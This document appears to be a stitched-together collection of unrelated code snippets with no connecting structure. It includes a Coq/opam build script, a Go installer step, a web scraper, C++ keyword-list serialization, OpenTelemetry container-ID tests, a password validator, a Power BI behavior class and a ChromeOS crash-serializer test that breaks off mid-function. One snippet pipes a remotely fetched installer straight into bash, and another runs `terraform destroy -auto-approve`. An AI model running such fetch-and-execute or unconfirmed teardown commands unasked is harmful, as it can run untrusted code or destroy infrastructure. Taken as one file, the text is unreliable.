# Note: this frequently proved to be required (build errors when doing experiments)
# Note: this keeps downloads and logs
opam clean --switch-cleanup

###################### HACK OPAM ARCHITECTURE ON 32 BIT CYGWIN #####################

# Note: opam running on 32 bit cygwin on 64 bit windows has arch x86_64
# Work around by forcing arch to i686 in the switch-config file.
if [ "$OSTYPE" == cygwin ] && [ "$BITSIZE" == 32 ] && [ "$(opam var arch)" != i686 ]
then
  conf_file="$(opam var prefix)"/.opam-switch/switch-config
  # Search for "variables {", print it, print an additional variable assignment and continue with next line
  # For everything else (condition 1) do the default action of print $0
  awk '/^variables \{/ {print $0; print " arch: \"i686\""; next} 1' "$conf_file" > "$conf_file.tmp"
  mv "$conf_file.tmp" "$conf_file"
fi

###################### Update opam ######################

echo "===== UPDATE OPAM REPOSITORIES ====="

# Refresh all repositories at most once per hour (tracked via a timestamp
# file); otherwise only the switch-local patch repo is updated.
if [ ! -f "$HOME/.opam_update_timestamp" ] || [ $(find "$HOME/.opam_update_timestamp" -mmin +60 -print) ]
then
  $COQ_PLATFORM_TIME opam update
  touch "$HOME/.opam_update_timestamp"
else
  $COQ_PLATFORM_TIME opam update "patch$COQ_PLATFORM_SWITCH_NAME"
fi
|
# Go toolchain version to install via gvm.
GO_VERSION=1.17.3

# Install gvm (Go Version Manager) if it is not already on PATH, then
# install and select the pinned Go version.
# FIX: `test ! $(which gvm)` is fragile — it breaks when `which` prints
# nothing (empty word) or multiple paths; `command -v` is the robust idiom.
if ! command -v gvm &> /dev/null
then
  echo "Installing gvm for you."
  curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer | bash
  source "$HOME/.gvm/scripts/gvm"
  gvm install "go${GO_VERSION}"
  gvm use "go${GO_VERSION}"
fi
|
# Prompt for a department number and print the name, salary and department
# fields ($2, $6, $8) of matching records in emp.txt.
echo -n "Enter deptno : "
read -r deptno
# FIX: pass the value with -v instead of splicing it into the awk program
# text — immune to word splitting and to malformed/malicious input.
awk -v deptno="$deptno" '$8 == deptno {print $2, $6, $8}' emp.txt
|
/**
 * Classifies a numeric string as even or odd.
 * @param {string|number} input - Value to check; parsed as a base-10 integer.
 * @returns {string} 'Input is even', 'Input is odd', or 'Input is not a number'.
 */
const checkNum = (input) => {
  // FIX: always pass the radix to parseInt, and use the non-coercing
  // Number.isNaN instead of the global isNaN.
  const parsedInput = Number.parseInt(input, 10);
  if (Number.isNaN(parsedInput)) {
    return 'Input is not a number';
  }
  return parsedInput % 2 === 0 ? 'Input is even' : 'Input is odd';
};
console.log(checkNum('2')); // Output: Input is even
<reponame>JoaoHenriquePereira/currency-scrapper
/**
* Module dependencies.
*/
import _ from 'lodash';
import x from '../utils/xray';
import { Assert } from '../validator';
import { validate } from '../validator';
/**
 * Get pair.
 *
 * Fetches bid/ask quotes for a currency pair from investing.com. If the
 * first fetch yields no quote, retries with the reversed pair. Note that
 * `pair.reverse()` mutates the caller's array and the returned key then
 * reflects the reversed order — preserved from the original behavior.
 */
async function getPair(pair) {
  let url = `http://www.investing.com/currencies/${pair.join('-')}`;
  let [bid, ask] = await x(url, '#quotes_summary_secondary_data', ['.inlineblock']);
  if (!ask || !bid) {
    url = `http://www.investing.com/currencies/${pair.reverse().join('-')}`;
    [bid, ask] = await x(url, '#quotes_summary_secondary_data', ['.inlineblock']);
  }
  // FIX: `_.object` was removed in lodash 4; a computed property key is
  // equivalent and dependency-free.
  return { [pair.join('')]: { ask, bid } };
}
/**
 * Export `ScrapCurrencyPairCommand`.
 *
 * Validates that `options.pair` is a required two-element array, then
 * scrapes and returns the quote for that pair.
 */
export async function run(options) {
  validate(options, { pair: [new Assert().Required(), new Assert().Count(2)] });
  const { pair } = options;
  // `return await` adds nothing outside a try/catch; return the promise directly.
  return getPair(pair);
}
|
/*
* Copyright (C) 2005-2017 by Centre National d'Etudes Spatiales (CNES)
*
* This file is licensed under MIT license:
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#include <otb/SceneCoord.h>
#include <ossim/base/ossimDpt3d.h>
#include <ossim/base/ossimKeywordlist.h>
#include <ossim/base/ossimNotify.h>
#include <ossim/base/ossimString.h>
namespace ossimplugins
{
// Keywordlist key names shared by saveState()/loadState()/print() below.
static const char SCENE_COORD[] = "sceneCoord";
static const char NUMBER_OF_SCENE_CORNER_COORD[] = "numberOfSceneCornerCoord";
static const char SCENE_CENTER_COORD[] = "sceneCenterCoord";
static const char SCENE_CORNER_COORD[] = "sceneCornerCoord";
// Default constructor: zero corner count, default-constructed center and
// empty corner table.
SceneCoord::SceneCoord()
   :
   _numberOfSceneCoord(0),
   _centerSceneCoord(),
   _tabCornersSceneCoord()
{
}
// Destructor: members release their own resources.
SceneCoord::~SceneCoord()
{
}
// Copy constructor: member-wise copy of count, center and corner table.
SceneCoord::SceneCoord(const SceneCoord& rhs)
   :
   _numberOfSceneCoord(rhs._numberOfSceneCoord),
   _centerSceneCoord(rhs._centerSceneCoord),
   _tabCornersSceneCoord(rhs._tabCornersSceneCoord)
{
}
// Assignment operator: member-wise copy, safe against self-assignment.
SceneCoord& SceneCoord::operator=(const SceneCoord& rhs)
{
   if (&rhs != this)
   {
      _numberOfSceneCoord   = rhs._numberOfSceneCoord;
      _centerSceneCoord     = rhs._centerSceneCoord;
      _tabCornersSceneCoord = rhs._tabCornersSceneCoord;
   }
   return *this;
}
// Serializes this object into `kwl` under "<prefix>sceneCoord.": the corner
// count, the center coordinate, and one "sceneCornerCoord[i]" entry per
// corner. Always returns true.
bool SceneCoord::saveState(ossimKeywordlist& kwl, const char* prefix) const
{
   const std::string base =
      (prefix ? std::string(prefix) : std::string()) + SCENE_COORD;
   const std::string dotted = base + ".";

   kwl.add(dotted.c_str(), NUMBER_OF_SCENE_CORNER_COORD, _numberOfSceneCoord);

   // Center coordinate.
   const std::string centerKey = base + "." + SCENE_CENTER_COORD;
   _centerSceneCoord.saveState(kwl, centerKey.c_str());

   // Corner coordinates, indexed as sceneCornerCoord[i].
   const std::string cornerBase = base + "." + SCENE_CORNER_COORD;
   for (unsigned int i = 0; i < _tabCornersSceneCoord.size(); ++i)
   {
      const std::string cornerKey =
         cornerBase + "[" + ossimString::toString(i).c_str() + "]";
      _tabCornersSceneCoord[i].saveState(kwl, cornerKey.c_str());
   }
   return true;
}
// Restores this object from `kwl` under "<prefix>sceneCoord.".
// Returns false if the corner-count key is missing or any sub-load fails.
bool SceneCoord::loadState(const ossimKeywordlist& kwl, const char* prefix)
{
   static const char MODULE[] = "SceneCoord::loadState";
   bool result = true;
   ossimString s;
   const char* lookup = 0;
   std::string pfx("");
   if (prefix)
   {
      pfx = prefix;
   }
   pfx += SCENE_COORD;
   pfx += ".";
   lookup = kwl.find(pfx.c_str(), NUMBER_OF_SCENE_CORNER_COORD);
   if (lookup)
   {
      s = lookup;
      _numberOfSceneCoord = s.toUInt32();
   }
   else
   {
      ossimNotify(ossimNotifyLevel_WARN)
         << MODULE << " Keyword not found: " << NUMBER_OF_SCENE_CORNER_COORD << " in "<<pfx <<" path.\n";
      result = false;
   }
   // BUG FIX: the original overwrote `result` with each sub-load's status,
   // so an earlier failure (e.g. the missing-count warning above) was
   // silently lost. Accumulate failures instead.
   std::string s1 = pfx + SCENE_CENTER_COORD;
   result = _centerSceneCoord.loadState(kwl, s1.c_str()) && result;
   _tabCornersSceneCoord.clear();
   std::string s2 = pfx + SCENE_CORNER_COORD;
   for (unsigned int i = 0; i < _numberOfSceneCoord; ++i)
   {
      std::string s3 = s2 + "[" + ossimString::toString(i).c_str() + "]";
      InfoSceneCoord isc;
      result = isc.loadState(kwl, s3.c_str()) && result;
      _tabCornersSceneCoord.push_back(isc);
   }
   if( _numberOfSceneCoord != _tabCornersSceneCoord.size() )
   {
      ossimNotify(ossimNotifyLevel_WARN)
         << MODULE << " Keyword " << NUMBER_OF_SCENE_CORNER_COORD << " is different with the number of _tabCornersScenceCoord nodes \n";
   }
   return result;
}
// Pretty-prints the scene coordinates by round-tripping through a temporary
// keywordlist and streaming it.
// NOTE(review): uses unqualified setprecision/setiosflags/ios — presumably a
// `using namespace std` is in effect elsewhere in this translation unit;
// confirm before reusing standalone.
std::ostream& SceneCoord::print(std::ostream& out) const
{
   out << setprecision(15) << setiosflags(ios::fixed)
       << "\n SceneCoord class data members:\n";
   const char* prefix = 0;
   ossimKeywordlist kwl;
   ossimString pfx;
   pfx += SCENE_COORD;
   ossimString s = pfx + "." + NUMBER_OF_SCENE_CORNER_COORD;
   kwl.add(prefix, s.c_str(), _numberOfSceneCoord);
   ossimString s1 = pfx + "." + SCENE_CENTER_COORD;
   _centerSceneCoord.saveState(kwl, s1.c_str());
   ossimString s2 =pfx + "." + SCENE_CORNER_COORD;
   for (unsigned int i = 0; i < _tabCornersSceneCoord.size(); ++i)
   {
      ossimString s3 = s2 + "[" + ossimString::toString(i) + "]";
      _tabCornersSceneCoord[i].saveState(kwl, s3.c_str());
   }
   out << kwl;
   return out;
}
}
|
def get_max_value(d):
    """Return the largest value in dictionary ``d``.

    Uses the built-in ``max`` instead of a manual accumulator loop.
    Returns ``float('-inf')`` for an empty dictionary, matching the
    original accumulator-based behavior.
    """
    return max(d.values(), default=float('-inf'))
if __name__ == '__main__':
    # BUG FIX: the original `dict(map(str, text.split(',')))` raises a
    # ValueError because each comma-separated token is a plain string, not
    # a key/value pair. Parse explicit "key:value" entries instead.
    raw = input('Please enter a dictionary (e.g. a:1,b:2): ')
    d = {}
    for item in raw.split(','):
        key, sep, value = item.partition(':')
        if sep:
            d[key.strip()] = float(value)
    output = get_max_value(d)
    print('The maximum value in the dictionary is ', output)
<gh_stars>0
package ru.stqa.pft.addressbook.tests;
import org.testng.annotations.Test;
import ru.stqa.pft.addressbook.model.ContactData;
import java.util.Arrays;
import java.util.stream.Collectors;
import static org.hamcrest.CoreMatchers.*;
import static org.hamcrest.MatcherAssert.*;
public class ContactTests extends TestBase {
@Test
public void testContact() {
app.goTo().gotoHomePage();
ContactData contact = app.contact().all().iterator().next();
ContactData contactInfoFromEditForm = app.contact().infoFromEditForm(contact);
assertThat(contact.getAllphones(), equalTo(mergePhones(contactInfoFromEditForm)));
assertThat(contact.getAddress(), equalTo(mergeAddress(contactInfoFromEditForm)));
assertThat(contact.getAllemails(), equalTo(mergeEmails(contactInfoFromEditForm)));
}
private String mergePhones(ContactData contact) {
return Arrays.asList(contact.getHomephone(), contact.getMobilephone(), contact.getWorkphone(), contact.getSecondphone())
.stream()
.map(ContactTests::cleaned)
.filter(s -> !s.equals("")).collect(Collectors.joining("\n"));
}
private String mergeAddress(ContactData contact) {
return Arrays.asList(contact.getAddress())
.stream()
.filter(s -> !s.equals("")).collect(Collectors.joining(""));
}
private String mergeEmails(ContactData contact) {
return Arrays.asList(contact.getEmail1(), contact.getEmail2(), contact.getEmail3())
.stream()
.filter(s -> !s.equals("")).collect(Collectors.joining("\n"));
}
public static String cleaned(String phone) {
return phone.replaceAll("\\s", "").replaceAll("[-()]", "");
}
} |
/*
statsd daemon configuration reference:
https://github.com/statsd/statsd/blob/master/exampleConfig.js
elasticsearch-statsd-backend configuration reference:
https://github.com/reconbot/elasticsearch-statsd-backend
*/
module.exports = {
port: process.env.STATSD_PORT || 8125,
backends: [ 'elasticsearch-statsd-backend' ],
elasticsearch: {
url: process.env.ES_URL || 'http://localhost:9200',
indexPrefix: process.env.ES_INDEX_PREFIX || "statsd-",
// shutdown on template failure unless explicitly marked optional
shutdownOnStartupError: process.env.ES_TEMPLATES_OPTIONAL !== 'true',
// "months" => ${indexPrefix}-${YYYY-MM}
// "day" => ${indexPrefix}-${YYYY-MM-DD}
// "hour" => ${indexPrefix}-${YYYY-MM-DDTHH}
indexTimestamp: process.env.ES_INDEX_TIMESTAMP || 'day',
counterIndexName: process.env.ES_COUNTER_INDEX || 'counter',
timerIndexName: process.env.ES_TIMER_INDEX || 'timer',
gaugeIndexName: process.env.ES_GAUGE_INDEX || 'gauge',
setIndexName: process.env.ES_SET_INDEX || 'set',
// parse any JSON object index templates provided
counterTemplate: process.env.ES_COUNTER_TEMPLATE ? JSON.parse(process.env.ES_COUNTER_TEMPLATE): undefined,
timerTemplate: process.env.ES_TIMER_TEMPLATE ? JSON.parse(process.env.ES_TIMER_TEMPLATE): undefined,
gaugeTemplate: process.env.ES_GAUGE_TEMPLATE ? JSON.parse(process.env.ES_GAUGE_TEMPLATE): undefined,
setTemplate: process.env.ES_SET_TEMPLATE ? JSON.parse(process.env.ES_SET_TEMPLATE): undefined,
}
}
|
<filename>sdk/resource/container_test.go
// Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package resource
import (
"errors"
"io"
"os"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
// setDefaultContainerProviders restores the production container-ID
// provider (reading from the cgroup file) after a test has overridden it.
func setDefaultContainerProviders() {
	setContainerProviders(
		getContainerIDFromCGroup,
	)
}
// setContainerProviders swaps the package-level containerID provider,
// letting tests inject a fake implementation.
func setContainerProviders(
	idProvider containerIDProvider,
) {
	containerID = idProvider
}
// TestGetContainerIDFromLine checks extraction of a container ID from a
// single cgroup-file line: IDs with prefixes/suffixes, surrounding
// whitespace, invalid hex, and lines with no ID (empty result expected).
func TestGetContainerIDFromLine(t *testing.T) {
	testCases := []struct {
		name                string
		line                string
		expectedContainerID string
	}{
		{
			name:                "with suffix",
			line:                "13:name=systemd:/podruntime/docker/kubepods/ac679f8a8319c8cf7d38e1adf263bc08d23.aaaa",
			expectedContainerID: "ac679f8a8319c8cf7d38e1adf263bc08d23",
		},
		{
			name:                "with prefix and suffix",
			line:                "13:name=systemd:/podruntime/docker/kubepods/crio-dc679f8a8319c8cf7d38e1adf263bc08d23.stuff",
			expectedContainerID: "dc679f8a8319c8cf7d38e1adf263bc08d23",
		},
		{
			name:                "no prefix and suffix",
			line:                "13:name=systemd:/pod/d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356",
			expectedContainerID: "d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356",
		},
		{
			name:                "with space",
			line:                " 13:name=systemd:/pod/d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356 ",
			expectedContainerID: "d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356",
		},
		{
			// expectedContainerID left empty: invalid hex must be rejected.
			name: "invalid hex string",
			line: "13:name=systemd:/podruntime/docker/kubepods/ac679f8a8319c8cf7d38e1adf263bc08d23zzzz",
		},
		{
			name: "no container id - 1",
			line: "pids: /",
		},
		{
			name: "no container id - 2",
			line: "pids: ",
		},
	}
	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			containerID := getContainerIDFromLine(tc.line)
			assert.Equal(t, tc.expectedContainerID, containerID)
		})
	}
}
// TestGetContainerIDFromReader checks that scanning a multi-line cgroup
// stream returns the first container ID found, or "" when none is present.
func TestGetContainerIDFromReader(t *testing.T) {
	testCases := []struct {
		name                string
		reader              io.Reader
		expectedContainerID string
	}{
		{
			name: "multiple lines",
			reader: strings.NewReader(`//
1:name=systemd:/podruntime/docker/kubepods/docker-dc579f8a8319c8cf7d38e1adf263bc08d23
1:name=systemd:/podruntime/docker/kubepods/docker-dc579f8a8319c8cf7d38e1adf263bc08d24
`),
			expectedContainerID: "dc579f8a8319c8cf7d38e1adf263bc08d23",
		},
		{
			name: "no container id",
			reader: strings.NewReader(`//
1:name=systemd:/podruntime/docker
`),
			expectedContainerID: "",
		},
	}
	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			containerID := getContainerIDFromReader(tc.reader)
			assert.Equal(t, tc.expectedContainerID, containerID)
		})
	}
}
// TestGetContainerIDFromCGroup stubs the package-level osStat/osOpen hooks
// to simulate a missing cgroup file, an open failure, and a normal read.
// t.Cleanup restores the default implementations afterwards.
func TestGetContainerIDFromCGroup(t *testing.T) {
	t.Cleanup(func() {
		osStat = defaultOSStat
		osOpen = defaultOSOpen
	})
	testCases := []struct {
		name                string
		cgroupFileNotExist  bool
		openFileError       error
		content             string
		expectedContainerID string
		expectedError       bool
	}{
		{
			name:               "the cgroup file does not exist",
			cgroupFileNotExist: true,
		},
		{
			name:          "error when opening cgroup file",
			openFileError: errors.New("test"),
			expectedError: true,
		},
		{
			name:                "cgroup file",
			content:             "1:name=systemd:/podruntime/docker/kubepods/docker-dc579f8a8319c8cf7d38e1adf263bc08d23",
			expectedContainerID: "dc579f8a8319c8cf7d38e1adf263bc08d23",
		},
	}
	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			// Stub stat: report ErrNotExist when the case says the file is missing.
			osStat = func(name string) (os.FileInfo, error) {
				if tc.cgroupFileNotExist {
					return nil, os.ErrNotExist
				}
				return nil, nil
			}
			// Stub open: either fail or serve the case's file content.
			osOpen = func(name string) (io.ReadCloser, error) {
				if tc.openFileError != nil {
					return nil, tc.openFileError
				}
				return io.NopCloser(strings.NewReader(tc.content)), nil
			}
			containerID, err := getContainerIDFromCGroup()
			assert.Equal(t, tc.expectedError, err != nil)
			assert.Equal(t, tc.expectedContainerID, containerID)
		})
	}
}
|
/**
 * Returns the largest element of `arr`.
 * @param {number[]} arr - Values to scan; an empty array yields `undefined`
 *   (same as the original implementation).
 * @returns {number|undefined} The maximum value.
 */
function findLargestValue(arr) {
  let max = arr[0];
  for (const value of arr) {
    if (value > max) {
      max = value;
    }
  }
  return max;
}

const result = findLargestValue([1, 2, 3, 4, 5]);
console.log(result);
package fr.syncrase.ecosyst.domain.classification.entities.mappers;
import fr.syncrase.ecosyst.domain.classification.entities.IUrl;
import fr.syncrase.ecosyst.domain.classification.entities.database.Url;
import org.jetbrains.annotations.NotNull;
/**
 * Maps classification URL abstractions ({@link IUrl}) to database
 * {@link Url} entities.
 */
public class UrlMapper {
    // public AtomicUrl get(@NotNull Url url) {
    // return new AtomicUrl(url.getUrl(), url.getId());
    // }

    /**
     * Builds a database {@link Url} entity carrying the same URL string and
     * id as the given source object.
     */
    public static Url get(@NotNull IUrl url) {
        return new Url(url.getUrl(), url.getId());
    }
}
|
SELECT first_name, last_name FROM people WHERE age BETWEEN 18 AND 40; |
public String reverseString(String str) {
StringBuilder builder = new StringBuilder();
for (int i = str.length() - 1; i >= 0; --i) {
builder.append(str.charAt(i));
}
return builder.toString();
} |
package main
import (
"fmt"
"github.com/roylee0704/gron"
"sync"
"time"
)
/*
1. c.Add(gron.Every(), j Job)
1.1 Job is an interface type: any struct that implements a Run method
    satisfies the Job interface, and the second argument of c.Add accepts
    any value implementing Job:
	type Job interface{
		Run()
	}
1.2 Example of implementing the Job interface:
	type Test struct{}
	func (t Test) Run() {xxx}
1.3 Calling the Add method:
	t := Test{}
	c.Add(gron.Every(5*time.Second), t)
*/
// GreetingJob is a gron job that greets a person by name.
type GreetingJob struct {
	Name string
}

// Run implements the gron Job interface; called on each schedule tick.
func (g GreetingJob) Run() {
	fmt.Println("Hello ", g.Name)
}
// main schedules two greeting jobs (every 5s and every 10s) and then blocks
// forever: the WaitGroup counter is incremented once but never decremented,
// so wg.Wait() deliberately never returns, keeping the scheduler alive.
func main() {
	var wg sync.WaitGroup
	wg.Add(1)
	g1 := GreetingJob{Name: "lh"}
	g2 := GreetingJob{Name: "ls"}
	c := gron.New()
	c.Add(gron.Every(5*time.Second), g1)
	c.Add(gron.Every(10*time.Second), g2)
	c.Start()
	wg.Wait()
}
|
#!/bin/bash
# Tear down all Terraform-managed infrastructure defined in ./terraform
# without prompting for confirmation. The && guard skips destroy if the
# directory change fails.
cd terraform && terraform destroy -auto-approve
<reponame>bianjieai/iobscan-ibc-explorer-backend<filename>src/monitor/ibc_monitor.service.test.ts<gh_stars>1-10
import {IbcMonitorService} from "../monitor/ibc_monitor.service";
import {Test} from "@nestjs/testing";
import {AppModule} from "../app.module";
// Tests for IbcMonitorService: boots the full AppModule via Nest's testing
// harness and calls the service's query helpers, logging their results.
describe('IbcMonitorService', () => {
    let ibcMonitorService: IbcMonitorService;
    // Compile a fresh testing module and resolve the service before each case.
    beforeEach(async () => {
        const module = await Test.createTestingModule({
            imports: [
                AppModule
            ]
        }).compile();
        ibcMonitorService = module.get<IbcMonitorService>(IbcMonitorService);
    })
    describe('getProcessingCnt', () => {
        it('getProcessingCnt Test', async () => {
            const result = await ibcMonitorService.getProcessingCnt()
            console.log(result, '----')
        });
    });
    describe('getNodeInfo', () => {
        it('getNodeInfo Test', async () => {
            // Arguments are an RPC endpoint URL and a chain identifier.
            const result = await ibcMonitorService.getNodeInfo("https://cosmoshub.stakesystems.io/","cosmoshub_4")
            console.log(result, '----')
        });
    });
})
|
import java.util.StringTokenizer;
public class ReverseWords
{
    /**
     * Prints each whitespace-separated word of {@code str} with its
     * characters reversed, preserving word order. Every word — including
     * the last — is followed by a single space, matching the original
     * output format.
     */
    static void reverseWord(String str)
    {
        StringTokenizer st = new StringTokenizer(str, " ");
        // FIX: accumulate in a StringBuilder; repeated String "+=" in a
        // loop re-copies the whole result each iteration (O(n^2)).
        StringBuilder result = new StringBuilder();
        while (st.hasMoreTokens())
        {
            result.append(new StringBuilder(st.nextToken()).reverse());
            result.append(' ');
        }
        System.out.print(result);
    }

    public static void main(String[] args)
    {
        String str = "Hello World";
        reverseWord(str);
    }
}
<gh_stars>1-10
/**
 * Validates a password against the complexity rules and returns a
 * newline-separated message listing every failed rule, or `undefined`
 * when the password passes all rules (or when no value was supplied).
 */
export function validatePassword(value: string | undefined): string | undefined {
  if (typeof value === 'undefined') {
    return undefined;
  }

  const candidate = value.trim();

  // Each rule is [passes, message]; failed-rule messages are joined in order.
  const rules: Array<[boolean, string]> = [
    [candidate.length >= 6, `Passwords must be at least 6 characters.\n`],
    [/[^a-zA-Z0-9]/.test(candidate), `Passwords must have at least one non alphanumeric character.\n`],
    [/[a-z]/.test(candidate), `Passwords must have at least one lowercase ('a'-'z').\n`],
    [/[A-Z]/.test(candidate), `Passwords must have at least one uppercase('A'-'Z').\n`],
    [/[0-9]/.test(candidate), `Passwords must have at least one digit ('0'-'9').\n`],
  ];

  const errorMessage = rules
    .filter(([passes]) => !passes)
    .map(([, message]) => message)
    .join('');

  return errorMessage.length > 0 ? errorMessage : undefined;
}
|
/*
* Power BI Visualizations
*
* Copyright (c) Microsoft Corporation
* All rights reserved.
* MIT License
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the ""Software""), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
import {
interactivitySelectionService,
interactivityBaseService
} from "powerbi-visuals-utils-interactivityutils";
import { Selection, select } from "d3-selection";
import { MekkoChartColumnDataPoint } from "./../dataInterfaces";
import { VisualBehaviorOptions } from "./visualBehaviorOptions";
import * as utils from "./../utils";
// powerbi.extensibility.utils.interactivity
import ISelectionHandler = interactivityBaseService.ISelectionHandler;
import IInteractiveBehavior = interactivityBaseService.IInteractiveBehavior;
import SelectionDataPoint = interactivitySelectionService.SelectableDataPoint;
const getEvent = () => require("d3-selection").event;
export class VisualBehavior implements IInteractiveBehavior {
    private options: VisualBehaviorOptions;

    /**
     * Wires selection-related DOM events on the visual's event group:
     * click forwards the clicked data point to the selection handler
     * (passing the Ctrl state, used for multi-select semantics), and
     * contextmenu is suppressed unless Ctrl is held.
     */
    public bindEvents(
        options: VisualBehaviorOptions,
        selectionHandler: ISelectionHandler): void {
        this.options = options;
        const eventGroup: Selection<any, any, any, any> = options.eventGroup;
        eventGroup.on("click", function () {
            // Resolve the data point d3 bound to the clicked element.
            const dataOfTheLastEvent: SelectionDataPoint = VisualBehavior.getDatumForLastInputEvent();
            selectionHandler.handleSelection(
                dataOfTheLastEvent,
                (getEvent() as MouseEvent).ctrlKey);
        });
        eventGroup.on("contextmenu", function () {
            const mouseEvent: MouseEvent = getEvent() as MouseEvent;
            if (mouseEvent.ctrlKey) {
                return;
            }
            mouseEvent.preventDefault();
        });
    }

    /**
     * Restyles each bar's fill-opacity from its selection/highlight state
     * via utils.getFillOpacity.
     */
    public renderSelection(hasSelection: boolean): void {
        this.options.bars.style("fill-opacity", (dataPoint: MekkoChartColumnDataPoint) => {
            return utils.getFillOpacity(
                dataPoint.selected,
                dataPoint.highlight,
                !dataPoint.highlight && hasSelection,
                !dataPoint.selected && this.options.hasHighlights);
        });
    }

    // Returns the datum d3 bound to the target element of the event that is
    // currently being dispatched.
    private static getDatumForLastInputEvent(): SelectionDataPoint {
        const target: EventTarget = (getEvent() as MouseEvent).target;
        return select((<any>target)).datum() as any;
    }
}
|
// Copyright 2020 The Chromium OS Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "crash-reporter/crash_serializer.h"
#include <string>
#include <tuple>
#include <utility>
#include <vector>
#include <inttypes.h>
#include <base/big_endian.h>
#include <base/files/file_util.h>
#include <base/files/scoped_temp_dir.h>
#include <base/strings/stringprintf.h>
#include <gmock/gmock.h>
#include <gtest/gtest.h>
#include "crash-reporter/crash_sender_base.h"
#include "crash-reporter/crash_sender_paths.h"
#include "crash-reporter/crash_serializer.pb.h"
#include "crash-reporter/paths.h"
#include "crash-reporter/test_util.h"
using test_util::kFakeClientId;
namespace crash_serializer {
namespace {
// Set the file flag which indicates we are mocking crash sending, either
// successfully or as a failure.
// Creates the mock-crash-sending flag file: empty contents mean "mock a
// successful send", "0" means "mock a failure". Returns false if the file
// could not be created.
bool SetMockCrashSending(bool success) {
  return test_util::CreateFile(
      paths::GetAt(paths::kSystemRunStateDirectory, paths::kMockCrashSending),
      success ? "" : "0");
}
} // namespace
class CrashSerializerTest : public testing::Test {
protected:
// Points all crash-reporter paths at a fresh scratch directory and ensures
// the directory that will hold the crash-sender lock file exists.
void SetUp() override {
  ASSERT_TRUE(temp_dir_.CreateUniqueTempDir());
  test_dir_ = temp_dir_.GetPath();
  paths::SetPrefixForTesting(test_dir_);
  // Make sure the directory for the lock file exists.
  const base::FilePath lock_file_path =
      paths::Get(paths::kCrashSenderLockFile);
  const base::FilePath lock_file_directory = lock_file_path.DirName();
  ASSERT_TRUE(base::CreateDirectory(lock_file_directory));
}
void TearDown() override { paths::SetPrefixForTesting(base::FilePath()); }
// Creates a file at |file_path| with contents |content| and sets its access
// and modification time to |timestamp|. Returns true on success; the
// short-circuit && skips the touch when file creation already failed.
bool CreateFile(const base::FilePath& file_path,
                base::StringPiece content,
                base::Time timestamp) {
  return test_util::CreateFile(file_path, content) &&
         test_util::TouchFileHelper(file_path, timestamp);
}
// Creates test crash files in |crash_directory|. Returns true on success.
bool CreateTestCrashFiles(const base::FilePath& crash_directory) {
const base::Time now = test_util::GetDefaultTime();
const base::TimeDelta hour = base::TimeDelta::FromHours(1);
// Choose timestamps so that the return value of GetMetaFiles() is sorted
// per timestamps correctly.
const base::Time old_os_meta_time = now - base::TimeDelta::FromDays(200);
const base::Time good_meta_time = now - hour * 4;
const base::Time absolute_meta_time = now - hour * 3;
const base::Time uploaded_meta_time = now - hour * 2;
const base::Time recent_os_meta_time = now - hour;
const base::Time devcore_meta_time = now;
// These should be serialized, since the payload is a known kind and exists.
good_meta_ = crash_directory.Append("good.meta");
good_log_ = crash_directory.Append("good.log");
if (!CreateFile(good_meta_, "payload=good.log\ndone=1\n", good_meta_time))
return false;
if (!CreateFile(good_log_, "", now))
return false;
// These should be serialized, the payload path is absolute but should be
// handled properly.
absolute_meta_ = crash_directory.Append("absolute.meta");
absolute_log_ = crash_directory.Append("absolute.log");
if (!CreateFile(absolute_meta_,
"payload=" + absolute_log_.value() + "\n" + "done=1\n",
absolute_meta_time))
return false;
if (!CreateFile(absolute_log_, "", now))
return false;
